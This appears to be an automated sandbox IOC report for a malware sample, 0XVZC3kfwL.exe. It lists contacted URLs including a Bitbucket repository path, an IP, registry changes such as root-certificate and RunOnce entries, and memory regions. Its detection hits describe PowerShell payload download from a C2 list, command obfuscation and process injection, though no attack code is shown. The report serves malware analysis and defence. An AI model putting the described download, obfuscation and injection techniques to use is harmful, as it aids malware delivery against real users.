https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bi

unknown

http://nuget.org/NuGet.exe

unknown

http://www.apache.org/licenses/LICENSE-2.0

unknown

https://id.atlassian.com/login

unknown

http://pesterbdd.com/images/Pester.png

unknown

https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date&

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://go.micro

unknown

https://id.atlassian.com/logout

unknown

http://bitbucket.org

unknown

https://web-security-reports.services.atlassian.com/csp-report/bb-website

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/dj

unknown

https://contoso.com/Icon

unknown

https://dz8aopenkvv6s.cloudfront.net

unknown

https://github.com/Pester/Pester

unknown

https://id.atlassian.com/manage-profile/

unknown

https://id.atlassian.com/login?prompt=login&continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ft

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/

unknown

https://cdn.cookielaw.org/

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_

unknown

https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;

unknown

https://remote-app-switcher.stg-east.frontend.public.atl-paas.net

unknown

https://aka.ms/pscore68

unknown

https://oneget.org

unknown

There are 42 hidden URLs, click here to show them.

Domains

Name

Malicious

bitbucket.org

185.166.143.49

Details

Name:	bitbucket.org
IP:	185.166.143.49
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Suricata IDS alerts with low severity for network traffic	Networking
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

185.166.143.49

bitbucket.org

Germany

Details

IP:	185.166.143.49
TargetID:	5
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Germany
Countrycode:	DEU
ASN number:	16509
ASN name:	AMAZON-02US
Private:	false
Domain:	bitbucket.org

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts with low severity for network traffic	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

wextract_cleanup0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

There are 7 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

1EEDDE91000

heap

page read and write

1EEC73BF000

trusted library allocation

page read and write

1EEDDF83000

heap

page read and write

7FFB4AF90000

trusted library allocation

page read and write

1EEDE270000

heap

page read and write

996637E000

stack

page read and write

2320A76A000

trusted library allocation

page read and write

7FFB4AEC0000

trusted library allocation

page read and write

1EEC7243000

trusted library allocation

page read and write

2320A635000

trusted library allocation

page read and write

1EEDDE37000

heap

page execute and read and write

9AF81FE000

stack

page read and write

99663FE000

stack

page read and write

236B1CC0000

heap

page read and write

1EEC5B80000

trusted library allocation

page read and write

7FFB4B040000

trusted library allocation

page read and write

7FFB4ACE0000

trusted library allocation

page read and write

7FFB4AF20000

trusted library allocation

page read and write

9966537000

stack

page read and write

23208570000

heap

page read and write

7FFB4ADC0000

trusted library allocation

page execute and read and write

1EED5DC5000

trusted library allocation

page read and write

7FF681C21000

unkown

page execute read

7FFB4AF80000

trusted library allocation

page read and write

1EEC737C000

trusted library allocation

page read and write

996627D000

stack

page read and write

23208545000

heap

page read and write

1EEC754F000

trusted library allocation

page read and write

2322265B000

heap

page read and write

1EEDDF08000

heap

page read and write

2320A26D000

trusted library allocation

page read and write

236B0625000

heap

page read and write

236B02D0000

heap

page read and write

1EEC5B30000

heap

page execute and read and write

2320A381000

trusted library allocation

page read and write

23209F90000

heap

page readonly

9AF837E000

stack

page read and write

1EEC733B000

trusted library allocation

page read and write

7FFB4AD56000

trusted library allocation

page read and write

1EEC3EE5000

heap

page read and write

9965DD3000

stack

page read and write

1EEDE004000

heap

page read and write

7FFB4AE70000

trusted library allocation

page execute and read and write

7FFB4AD8C000

trusted library allocation

page execute and read and write

7FFB4AF00000

trusted library allocation

page read and write

1EEC5C9C000

trusted library allocation

page read and write

2320861D000

heap

page read and write

17E9AAF6000

heap

page read and write

7FFB4AF60000

trusted library allocation

page read and write

7FFB4AF40000

trusted library allocation

page read and write

7FFB4AE40000

trusted library allocation

page read and write

2320A010000

trusted library allocation

page read and write

1EEC5B00000

trusted library allocation

page read and write

7FFB4AEB0000

trusted library allocation

page read and write

9AF85FE000

stack

page read and write

7FFB4AE8A000

trusted library allocation

page read and write

7FFB4AFB0000

trusted library allocation

page read and write

7FFB4AFA0000

trusted library allocation

page read and write

7FFB4AE51000

trusted library allocation

page read and write

1EEC56E6000

heap

page read and write

99667BF000

stack

page read and write

17E98C60000

heap

page read and write

1EEC72F8000

trusted library allocation

page read and write

1EEC3E14000

heap

page read and write

2320A671000

trusted library allocation

page read and write

2320A64B000

trusted library allocation

page read and write

1EEC5B40000

heap

page readonly

5B4EFEC000

stack

page read and write

7FFB4AFB0000

trusted library allocation

page read and write

7FFB4AF40000

trusted library allocation

page read and write

1EEC5BC0000

trusted library allocation

page read and write

1EEC3DE9000

heap

page read and write

9AF87FE000

stack

page read and write

1EEDDF3B000

heap

page read and write

1EEC7306000

trusted library allocation

page read and write

7FFB4AE5A000

trusted library allocation

page read and write

1EED5C20000

trusted library allocation

page read and write

1EEC3F10000

heap

page read and write

7FF681C2E000

unkown

page readonly

7FFB4AE70000

trusted library allocation

page read and write

2320A251000

trusted library allocation

page read and write

1EEC5B83000

trusted library allocation

page read and write

2320A7B4000

trusted library allocation

page read and write

1EEC3DCE000

heap

page read and write

9AF857D000

stack

page read and write

99660FE000

stack

page read and write

1EEDDE30000

heap

page execute and read and write

1EEC72FA000

trusted library allocation

page read and write

9AF8478000

stack

page read and write

23208540000

heap

page read and write

7FFB4ACD4000

trusted library allocation

page read and write

9AF82FF000

stack

page read and write

23222654000

heap

page read and write

232229B0000

heap

page read and write

9AF8073000

stack

page read and write

23209E66000

heap

page read and write

2320A8FA000

trusted library allocation

page read and write

2320A3C1000

trusted library allocation

page read and write

99668BB000

stack

page read and write

17E98C87000

heap

page read and write

7FFB4ADF0000

trusted library allocation

page execute and read and write

996683E000

stack

page read and write

7FFB4AE60000

trusted library allocation

page execute and read and write

7FFB4AD86000

trusted library allocation

page execute and read and write

236B02B0000

heap

page read and write

1EEDDF40000

heap

page execute and read and write

1EEC5B20000

trusted library allocation

page read and write

9966478000

stack

page read and write

2320A080000

heap

page read and write

2320A040000

heap

page execute and read and write

1EEC78F7000

trusted library allocation

page read and write

1EEC3D80000

heap

page read and write

1EEC56E8000

heap

page read and write

7FFB4AFE0000

trusted library allocation

page read and write

7FFB4ACDD000

trusted library allocation

page execute and read and write

236B0368000

heap

page read and write

5B4F2FF000

stack

page read and write

1EEC7380000

trusted library allocation

page read and write

2321A260000

trusted library allocation

page read and write

1EEC5C00000

heap

page read and write

17E98C8F000

heap

page read and write

1EEC3DEB000

heap

page read and write

1EEDDE70000

heap

page read and write

7FFB4AED0000

trusted library allocation

page read and write

7FFB4AFD0000

trusted library allocation

page read and write

1EEDDEB6000

heap

page read and write

2320A36D000

trusted library allocation

page read and write

2322262B000

heap

page read and write

1EEC6843000

trusted library allocation

page read and write

2320A37D000

trusted library allocation

page read and write

7FF681C20000

unkown

page readonly

17E98E00000

heap

page read and write

7FFB4AEA0000

trusted library allocation

page read and write

1EEDDFFA000

heap

page read and write

7FF681C2E000

unkown

page readonly

7FFB4AD90000

trusted library allocation

page execute and read and write

2320A047000

heap

page execute and read and write

96F77E000

stack

page read and write

7FF681C2C000

unkown

page read and write

7FF681C20000

unkown

page readonly

1EEC3DC4000

heap

page read and write

9AF887B000

stack

page read and write

236B0360000

heap

page read and write

1EEC75AA000

trusted library allocation

page read and write

7FFB4AD86000

trusted library allocation

page read and write

7FFB4AF20000

trusted library allocation

page read and write

232085A0000

heap

page read and write

99665B9000

stack

page read and write

7FFB4AED0000

trusted library allocation

page read and write

17E9A8F6000

heap

page read and write

9966637000

stack

page read and write

7FFB4ACA3000

trusted library allocation

page execute and read and write

2321A251000

trusted library allocation

page read and write

232085F1000

heap

page read and write

2320861B000

heap

page read and write

232225C5000

heap

page read and write

1EEC7698000

trusted library allocation

page read and write

7FFB4ACA2000

trusted library allocation

page read and write

7FFB4AD60000

trusted library allocation

page execute and read and write

2320A65D000

trusted library allocation

page read and write

7FFB4AFF0000

trusted library allocation

page read and write

9AF83FE000

stack

page read and write

2320A683000

trusted library allocation

page read and write

7FFB4AEF0000

trusted library allocation

page read and write

7FFB4AEF0000

trusted library allocation

page read and write

9AF80FE000

stack

page read and write

99666BE000

stack

page read and write

96F6FE000

stack

page read and write

23222590000

heap

page read and write

1EEDDE8F000

heap

page read and write

1EEC3F15000

heap

page read and write

23209F50000

trusted library allocation

page read and write

7FF681C29000

unkown

page readonly

2320A637000

trusted library allocation

page read and write

1EEC5C11000

trusted library allocation

page read and write

2320A69F000

trusted library allocation

page read and write

23209E40000

heap

page read and write

7FFB4AF80000

trusted library allocation

page read and write

7FFB4AD5C000

trusted library allocation

page execute and read and write

7FFB4AF30000

trusted library allocation

page read and write

1EEDDFFC000

heap

page read and write

2320A627000

trusted library allocation

page read and write

9AF92CD000

stack

page read and write

17E98AE0000

heap

page read and write

1EEDDF60000

heap

page read and write

1EEDDFAE000

heap

page read and write

7FFB4AEA0000

trusted library allocation

page execute and read and write

7FFB4B020000

trusted library allocation

page read and write

17E98C7E000

heap

page read and write

232085EF000

heap

page read and write

1EED5C11000

trusted library allocation

page read and write

2322263E000

heap

page read and write

9AF867F000

stack

page read and write

996607F000

stack

page read and write

2320A61A000

trusted library allocation

page read and write

2320A7A5000

trusted library allocation

page read and write

7FFB4AF70000

trusted library allocation

page read and write

1EEDDFED000

heap

page read and write

1EEC3EC0000

heap

page read and write

1EEC7523000

trusted library allocation

page read and write

7FFB4B000000

trusted library allocation

page read and write

7FFB4AD50000

trusted library allocation

page read and write

7FFB4AEB2000

trusted library allocation

page read and write

1EEC72E5000

trusted library allocation

page read and write

7FFB4ACB0000

trusted library allocation

page read and write

7FFB4AF60000

trusted library allocation

page read and write

2320A2A2000

trusted library allocation

page read and write

99664BE000

stack

page read and write

2320A60E000

trusted library allocation

page read and write

7FFB4ACA4000

trusted library allocation

page read and write

9AF84F7000

stack

page read and write

99661FE000

stack

page read and write

7FFB4AFA0000

trusted library allocation

page read and write

7FFB4AD80000

trusted library allocation

page read and write

9AF86FE000

stack

page read and write

2320A904000

trusted library allocation

page read and write

1EEC3C80000

heap

page read and write

2320A240000

heap

page execute and read and write

7FFB4AEE0000

trusted library allocation

page read and write

23209F75000

heap

page read and write

236B0620000

heap

page read and write

2320A277000

trusted library allocation

page read and write

2320A210000

heap

page execute and read and write

7FF681C21000

unkown

page execute read

1EEC730A000

trusted library allocation

page read and write

1EEC56C0000

heap

page read and write

2321A2C2000

trusted library allocation

page read and write

1EEC7302000

trusted library allocation

page read and write

7FFB4AF70000

trusted library allocation

page read and write

9AF817F000

stack

page read and write

1EEC3EE0000

heap

page read and write

7FFB4B010000

trusted library allocation

page read and write

7FFB4AF50000

trusted library allocation

page read and write

7FF681C2C000

unkown

page write copy

7FFB4AE82000

trusted library allocation

page read and write

1EEC78F3000

trusted library allocation

page read and write

7FFB4AE90000

trusted library allocation

page execute and read and write

236B01D0000

heap

page read and write

17E98E05000

heap

page read and write

23209F70000

heap

page read and write

7FFB4AF10000

trusted library allocation

page read and write

9AF877E000

stack

page read and write

1EEDDC12000

heap

page read and write

996673E000

stack

page read and write

23208500000

heap

page read and write

996617F000

stack

page read and write

23222700000

heap

page read and write

23208520000

heap

page read and write

2320A612000

trusted library allocation

page read and write

9AF924E000

stack

page read and write

1EEDDE40000

heap

page read and write

7FFB4ACEB000

trusted library allocation

page read and write

2320A2EF000

trusted library allocation

page read and write

7FFB4AFC0000

trusted library allocation

page read and write

7FF681C29000

unkown

page readonly

7FFB4AF10000

trusted library allocation

page read and write

17E98BC0000

heap

page read and write

7FFB4AE90000

trusted library allocation

page execute and read and write

1EEC782E000

trusted library allocation

page read and write

5B4F27F000

stack

page read and write

7FFB4AFC0000

trusted library allocation

page read and write

7FFB4AF90000

trusted library allocation

page read and write

2320A30B000

trusted library allocation

page read and write

1EEC72E0000

trusted library allocation

page read and write

23208678000

heap

page read and write

7FFB4ACAD000

trusted library allocation

page execute and read and write

2320A695000

trusted library allocation

page read and write

2320A77A000

trusted library allocation

page read and write

1EEC3DA0000

heap

page read and write

1EEDDF1A000

heap

page read and write

96F67C000

stack

page read and write

7FFB4AE42000

trusted library allocation

page read and write

7FFB4B030000

trusted library allocation

page read and write

23209F80000

trusted library allocation

page read and write

7FFB4AF30000

trusted library allocation

page read and write

99662FE000

stack

page read and write

7DF48FFE0000

trusted library allocation

page execute and read and write

7FFB4ACD3000

trusted library allocation

page execute and read and write

9AF7DEE000

stack

page read and write

7FFB4ADB6000

trusted library allocation

page execute and read and write

17E98C67000

heap

page read and write

1EEC5E43000

trusted library allocation

page read and write

7FFB4ACD2000

trusted library allocation

page read and write

23208420000

heap

page read and write

23222724000

heap

page read and write

9AF827D000

stack

page read and write

1EEDDEC8000

heap

page read and write

2320A2BE000

trusted library allocation

page read and write

7FFB4AEC0000

trusted library allocation

page execute and read and write

23208622000

heap

page read and write

17E98BE0000

heap

page read and write

2320A7F4000

trusted library allocation

page read and write

2320A3C8000

trusted library allocation

page read and write

7FFB4AF00000

trusted library allocation

page read and write

1EED5C83000

trusted library allocation

page read and write

7FFB4AEE0000

trusted library allocation

page read and write

1EEC3D60000

heap

page read and write

1EEDDF88000

heap

page read and write

23222708000

heap

page read and write

23208687000

heap

page read and write

232225FD000

heap

page read and write

7FFB4AF50000

trusted library allocation

page read and write

7FFB4AE81000

trusted library allocation

page read and write

There are 293 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
0XVZC3kfwL.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report0XVZC3kfwL.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
0XVZC3kfwL.exe